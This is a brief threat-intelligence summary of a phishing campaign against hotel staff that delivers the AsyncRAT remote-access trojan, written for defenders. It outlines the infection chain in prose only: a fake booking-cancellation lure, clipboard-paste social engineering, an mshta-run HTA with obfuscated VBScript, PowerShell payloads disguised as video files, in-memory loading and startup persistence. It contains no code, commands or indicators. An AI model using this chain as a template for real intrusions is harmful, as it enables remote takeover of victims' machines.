AsyncRAT Phishing Campaign Targeting Hotel Staff

WatchGuard observed a phishing campaign targeting hospitality staff that lures victims with a fake booking cancellation and a link to a purported review. The link leads to a Cloudflare-protected phishing page that conditions payload delivery on a Windows user; social-engineered clipboard-paste keyboard shortcuts trigger an mshta-run HTA that contains obfuscated VBScript which downloads two PowerShell payloads (disguised as .mp4 files). One payload loads AsyncRAT in-memory via .NET reflection, the other installs a startup persistence batch that re-downloads the malware, enabling remote access and re-infection. The report includes the phishing domain and several file hashes as IOCs and highlights the campaign's use of living-off-the-land techniques to evade signature-based defenses.